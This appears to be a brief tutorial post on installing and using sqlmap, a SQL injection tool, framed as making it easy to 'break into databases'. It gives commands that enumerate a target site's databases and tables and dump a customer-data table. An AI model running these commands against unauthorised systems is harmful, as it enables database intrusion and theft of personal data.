sqlmap is an open-source pentesting tool that automates the exploitation of SQL injection flaws.
The tool makes it pretty easy for anyone with basic command line knowledge to exploit and break into databases.
Installation
sudo apt-get install git git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev cd sqlmap-devTo list available options:
python sqlmap.py -hFetch database names of vulnerable url:
python sqlmap.py -u www.example.com/home.php?ID=10 --dbsEnumerate tables of a website's database (e.g.: test)
python sqlmap.py -u www.example.com/home.php?ID=10 -D test --tablesDump all data in database (test) and table (e.g.: costumer_data)
python sqlmap.py -u www.example.com/home.php?ID=10 -D test -T costumer_data --dumpMore examples are available here: https://gist.github.com/stamparm/5335217